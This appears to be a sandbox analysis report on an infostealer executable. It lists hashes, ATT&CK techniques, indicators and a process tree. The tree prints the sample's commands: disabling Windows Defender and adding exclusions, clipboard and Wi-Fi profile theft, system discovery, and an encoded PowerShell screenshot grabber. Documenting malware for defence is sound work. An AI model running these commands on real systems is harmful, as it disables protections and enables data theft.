29a1811536be10311519f8c8bfc783de43b830c5bbfb208b19c62001b1d82ff2

Analysis

max time kernel
95s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 15:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.6MB
MD5

36b01be67c9129366da05580375d2dd5
SHA1

2f99c4f4f2e1e5b51984a8ba5764417c2a658cdf
SHA256

29a1811536be10311519f8c8bfc783de43b830c5bbfb208b19c62001b1d82ff2
SHA512

56a37685656de3da9fb25c76d79c173cfa9d5f33212fae79bad83682946560506614ae69805eb8da00ce167e3fe6fb1199c57271e6c62869dcbf8ce37e773a7b
SSDEEP

196608:3ZmDXB9RHvUWvozWOxu9kXwvdbDlA03NQ8nwm2FlJKDry:JGXbRHdKbAlbZA03m8wm25KHy

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4484	powershell.exe
1180	powershell.exe
3912	powershell.exe
2920	powershell.exe
3652	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
392	cmd.exe
1284	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4360	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe
1788	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
16	discord.com
17	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
876	tasklist.exe
3012	tasklist.exe
4984	tasklist.exe
1228	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023bca-63.dat	upx
behavioral2/memory/1788-67-0x00007FFC30880000-0x00007FFC30CEA000-memory.dmp	upx
behavioral2/files/0x0031000000023b77-69.dat	upx
behavioral2/files/0x000a000000023b7c-127.dat	upx
behavioral2/files/0x000a000000023b7b-126.dat	upx
behavioral2/files/0x000a000000023b7a-125.dat	upx
behavioral2/files/0x000a000000023b79-124.dat	upx
behavioral2/files/0x0031000000023b78-123.dat	upx
behavioral2/files/0x0031000000023b76-122.dat	upx
behavioral2/files/0x0008000000023bfe-121.dat	upx
behavioral2/files/0x0008000000023bfc-120.dat	upx
behavioral2/files/0x0008000000023bcd-119.dat	upx
behavioral2/files/0x0008000000023bc7-116.dat	upx
behavioral2/files/0x0009000000023bc1-115.dat	upx
behavioral2/memory/1788-134-0x00007FFC3CC50000-0x00007FFC3CC6E000-memory.dmp	upx
behavioral2/memory/1788-133-0x00007FFC3CC70000-0x00007FFC3CC89000-memory.dmp	upx
behavioral2/memory/1788-135-0x00007FFC302A0000-0x00007FFC3040D000-memory.dmp	upx
behavioral2/memory/1788-136-0x00007FFC3CBF0000-0x00007FFC3CC09000-memory.dmp	upx
behavioral2/memory/1788-132-0x00007FFC3CC90000-0x00007FFC3CCBC000-memory.dmp	upx
behavioral2/memory/1788-137-0x00007FFC3F1A0000-0x00007FFC3F1AD000-memory.dmp	upx
behavioral2/memory/1788-138-0x00007FFC3CBC0000-0x00007FFC3CBEE000-memory.dmp	upx
behavioral2/memory/1788-141-0x00007FFC301E0000-0x00007FFC30296000-memory.dmp	upx
behavioral2/memory/1788-142-0x00007FFC2FE60000-0x00007FFC301D4000-memory.dmp	upx
behavioral2/memory/1788-150-0x00007FFC306A0000-0x00007FFC307B8000-memory.dmp	upx
behavioral2/memory/1788-149-0x00007FFC3CC50000-0x00007FFC3CC6E000-memory.dmp	upx
behavioral2/memory/1788-180-0x00007FFC302A0000-0x00007FFC3040D000-memory.dmp	upx
behavioral2/memory/1788-252-0x00007FFC3CBF0000-0x00007FFC3CC09000-memory.dmp	upx
behavioral2/memory/1788-316-0x00007FFC3F1A0000-0x00007FFC3F1AD000-memory.dmp	upx
behavioral2/memory/1788-146-0x00007FFC3F8F0000-0x00007FFC3F8FD000-memory.dmp	upx
behavioral2/memory/1788-145-0x00007FFC3CC70000-0x00007FFC3CC89000-memory.dmp	upx
behavioral2/memory/1788-144-0x00007FFC47540000-0x00007FFC47555000-memory.dmp	upx
behavioral2/memory/1788-140-0x00007FFC44350000-0x00007FFC44374000-memory.dmp	upx
behavioral2/memory/1788-139-0x00007FFC30880000-0x00007FFC30CEA000-memory.dmp	upx
behavioral2/memory/1788-74-0x00007FFC490E0000-0x00007FFC490EF000-memory.dmp	upx
behavioral2/memory/1788-73-0x00007FFC44350000-0x00007FFC44374000-memory.dmp	upx
behavioral2/files/0x000e000000023bc5-72.dat	upx
behavioral2/memory/1788-328-0x00007FFC3CBC0000-0x00007FFC3CBEE000-memory.dmp	upx
behavioral2/memory/1788-331-0x00007FFC301E0000-0x00007FFC30296000-memory.dmp	upx
behavioral2/memory/1788-353-0x00007FFC2FE60000-0x00007FFC301D4000-memory.dmp	upx
behavioral2/memory/1788-355-0x00007FFC30880000-0x00007FFC30CEA000-memory.dmp	upx
behavioral2/memory/1788-361-0x00007FFC302A0000-0x00007FFC3040D000-memory.dmp	upx
behavioral2/memory/1788-360-0x00007FFC3CC50000-0x00007FFC3CC6E000-memory.dmp	upx
behavioral2/memory/1788-356-0x00007FFC44350000-0x00007FFC44374000-memory.dmp	upx
behavioral2/memory/1788-369-0x00007FFC306A0000-0x00007FFC307B8000-memory.dmp	upx
behavioral2/memory/1788-384-0x00007FFC306A0000-0x00007FFC307B8000-memory.dmp	upx
behavioral2/memory/1788-383-0x00007FFC3F8F0000-0x00007FFC3F8FD000-memory.dmp	upx
behavioral2/memory/1788-382-0x00007FFC47540000-0x00007FFC47555000-memory.dmp	upx
behavioral2/memory/1788-381-0x00007FFC2FE60000-0x00007FFC301D4000-memory.dmp	upx
behavioral2/memory/1788-380-0x00007FFC301E0000-0x00007FFC30296000-memory.dmp	upx
behavioral2/memory/1788-379-0x00007FFC3CBC0000-0x00007FFC3CBEE000-memory.dmp	upx
behavioral2/memory/1788-378-0x00007FFC3F1A0000-0x00007FFC3F1AD000-memory.dmp	upx
behavioral2/memory/1788-377-0x00007FFC3CBF0000-0x00007FFC3CC09000-memory.dmp	upx
behavioral2/memory/1788-376-0x00007FFC302A0000-0x00007FFC3040D000-memory.dmp	upx
behavioral2/memory/1788-375-0x00007FFC3CC50000-0x00007FFC3CC6E000-memory.dmp	upx
behavioral2/memory/1788-374-0x00007FFC3CC70000-0x00007FFC3CC89000-memory.dmp	upx
behavioral2/memory/1788-373-0x00007FFC3CC90000-0x00007FFC3CCBC000-memory.dmp	upx
behavioral2/memory/1788-372-0x00007FFC490E0000-0x00007FFC490EF000-memory.dmp	upx
behavioral2/memory/1788-371-0x00007FFC44350000-0x00007FFC44374000-memory.dmp	upx
behavioral2/memory/1788-370-0x00007FFC30880000-0x00007FFC30CEA000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1624	netsh.exe
4016	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5112	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4572	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
4484	powershell.exe
2920	powershell.exe
2920	powershell.exe
3652	powershell.exe
3652	powershell.exe
4484	powershell.exe
4484	powershell.exe
1284	powershell.exe
1284	powershell.exe
3652	powershell.exe
3652	powershell.exe
1996	powershell.exe
1996	powershell.exe
1284	powershell.exe
1996	powershell.exe
1180	powershell.exe
1180	powershell.exe
228	powershell.exe
228	powershell.exe
3912	powershell.exe
3912	powershell.exe
2084	powershell.exe
2084	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	876	tasklist.exe
Token: SeDebugPrivilege	3012	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3532	WMIC.exe
Token: SeSecurityPrivilege	3532	WMIC.exe
Token: SeTakeOwnershipPrivilege	3532	WMIC.exe
Token: SeLoadDriverPrivilege	3532	WMIC.exe
Token: SeSystemProfilePrivilege	3532	WMIC.exe
Token: SeSystemtimePrivilege	3532	WMIC.exe
Token: SeProfSingleProcessPrivilege	3532	WMIC.exe
Token: SeIncBasePriorityPrivilege	3532	WMIC.exe
Token: SeCreatePagefilePrivilege	3532	WMIC.exe
Token: SeBackupPrivilege	3532	WMIC.exe
Token: SeRestorePrivilege	3532	WMIC.exe
Token: SeShutdownPrivilege	3532	WMIC.exe
Token: SeDebugPrivilege	3532	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3532	WMIC.exe
Token: SeRemoteShutdownPrivilege	3532	WMIC.exe
Token: SeUndockPrivilege	3532	WMIC.exe
Token: SeManageVolumePrivilege	3532	WMIC.exe
Token: 33	3532	WMIC.exe
Token: 34	3532	WMIC.exe
Token: 35	3532	WMIC.exe
Token: 36	3532	WMIC.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	4984	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3532	WMIC.exe
Token: SeSecurityPrivilege	3532	WMIC.exe
Token: SeTakeOwnershipPrivilege	3532	WMIC.exe
Token: SeLoadDriverPrivilege	3532	WMIC.exe
Token: SeSystemProfilePrivilege	3532	WMIC.exe
Token: SeSystemtimePrivilege	3532	WMIC.exe
Token: SeProfSingleProcessPrivilege	3532	WMIC.exe
Token: SeIncBasePriorityPrivilege	3532	WMIC.exe
Token: SeCreatePagefilePrivilege	3532	WMIC.exe
Token: SeBackupPrivilege	3532	WMIC.exe
Token: SeRestorePrivilege	3532	WMIC.exe
Token: SeShutdownPrivilege	3532	WMIC.exe
Token: SeDebugPrivilege	3532	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3532	WMIC.exe
Token: SeRemoteShutdownPrivilege	3532	WMIC.exe
Token: SeUndockPrivilege	3532	WMIC.exe
Token: SeManageVolumePrivilege	3532	WMIC.exe
Token: 33	3532	WMIC.exe
Token: 34	3532	WMIC.exe
Token: 35	3532	WMIC.exe
Token: 36	3532	WMIC.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1228	tasklist.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeIncreaseQuotaPrivilege	4140	WMIC.exe
Token: SeSecurityPrivilege	4140	WMIC.exe
Token: SeTakeOwnershipPrivilege	4140	WMIC.exe
Token: SeLoadDriverPrivilege	4140	WMIC.exe
Token: SeSystemProfilePrivilege	4140	WMIC.exe
Token: SeSystemtimePrivilege	4140	WMIC.exe
Token: SeProfSingleProcessPrivilege	4140	WMIC.exe
Token: SeIncBasePriorityPrivilege	4140	WMIC.exe
Token: SeCreatePagefilePrivilege	4140	WMIC.exe
Token: SeBackupPrivilege	4140	WMIC.exe
Token: SeRestorePrivilege	4140	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4172 wrote to memory of 1788	4172	Built.exe	83
PID 4172 wrote to memory of 1788	4172	Built.exe	83
PID 1788 wrote to memory of 4632	1788	Built.exe	170
PID 1788 wrote to memory of 4632	1788	Built.exe	170
PID 1788 wrote to memory of 4780	1788	Built.exe	85
PID 1788 wrote to memory of 4780	1788	Built.exe	85
PID 1788 wrote to memory of 3976	1788	Built.exe	86
PID 1788 wrote to memory of 3976	1788	Built.exe	86
PID 1788 wrote to memory of 2300	1788	Built.exe	89
PID 1788 wrote to memory of 2300	1788	Built.exe	89
PID 4632 wrote to memory of 2920	4632	cmd.exe	92
PID 4632 wrote to memory of 2920	4632	cmd.exe	92
PID 4780 wrote to memory of 4484	4780	cmd.exe	93
PID 4780 wrote to memory of 4484	4780	cmd.exe	93
PID 3976 wrote to memory of 4264	3976	cmd.exe	94
PID 3976 wrote to memory of 4264	3976	cmd.exe	94
PID 1788 wrote to memory of 5112	1788	Built.exe	181
PID 1788 wrote to memory of 5112	1788	Built.exe	181
PID 2300 wrote to memory of 3652	2300	cmd.exe	98
PID 2300 wrote to memory of 3652	2300	cmd.exe	98
PID 1788 wrote to memory of 940	1788	Built.exe	97
PID 1788 wrote to memory of 940	1788	Built.exe	97
PID 1788 wrote to memory of 392	1788	Built.exe	101
PID 1788 wrote to memory of 392	1788	Built.exe	101
PID 1788 wrote to memory of 3076	1788	Built.exe	156
PID 1788 wrote to memory of 3076	1788	Built.exe	156
PID 1788 wrote to memory of 4584	1788	Built.exe	104
PID 1788 wrote to memory of 4584	1788	Built.exe	104
PID 5112 wrote to memory of 876	5112	cmd.exe	105
PID 5112 wrote to memory of 876	5112	cmd.exe	105
PID 940 wrote to memory of 3012	940	cmd.exe	107
PID 940 wrote to memory of 3012	940	cmd.exe	107
PID 1788 wrote to memory of 4836	1788	Built.exe	108
PID 1788 wrote to memory of 4836	1788	Built.exe	108
PID 1788 wrote to memory of 4016	1788	Built.exe	109
PID 1788 wrote to memory of 4016	1788	Built.exe	109
PID 392 wrote to memory of 1284	392	cmd.exe	111
PID 392 wrote to memory of 1284	392	cmd.exe	111
PID 1788 wrote to memory of 2052	1788	Built.exe	112
PID 1788 wrote to memory of 2052	1788	Built.exe	112
PID 1788 wrote to memory of 1096	1788	Built.exe	113
PID 1788 wrote to memory of 1096	1788	Built.exe	113
PID 1788 wrote to memory of 4072	1788	Built.exe	115
PID 1788 wrote to memory of 4072	1788	Built.exe	115
PID 3076 wrote to memory of 3532	3076	cmd.exe	119
PID 3076 wrote to memory of 3532	3076	cmd.exe	119
PID 4584 wrote to memory of 4984	4584	cmd.exe	120
PID 4584 wrote to memory of 4984	4584	cmd.exe	120
PID 4836 wrote to memory of 4176	4836	cmd.exe	122
PID 4836 wrote to memory of 4176	4836	cmd.exe	122
PID 4016 wrote to memory of 1624	4016	cmd.exe	123
PID 4016 wrote to memory of 1624	4016	cmd.exe	123
PID 4072 wrote to memory of 1996	4072	cmd.exe	125
PID 4072 wrote to memory of 1996	4072	cmd.exe	125
PID 2052 wrote to memory of 4572	2052	cmd.exe	126
PID 2052 wrote to memory of 4572	2052	cmd.exe	126
PID 1096 wrote to memory of 3608	1096	cmd.exe	124
PID 1096 wrote to memory of 3608	1096	cmd.exe	124
PID 1788 wrote to memory of 1860	1788	Built.exe	127
PID 1788 wrote to memory of 1860	1788	Built.exe	127
PID 1788 wrote to memory of 2976	1788	Built.exe	129
PID 1788 wrote to memory of 2976	1788	Built.exe	129
PID 1860 wrote to memory of 2044	1860	cmd.exe	131
PID 1860 wrote to memory of 2044	1860	cmd.exe	131

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2552	attrib.exe
3092	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4172
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('car', 0, 'i shit my pants', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('car', 0, 'i shit my pants', 0+16);close()"
      4⤵
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3076
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4016
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0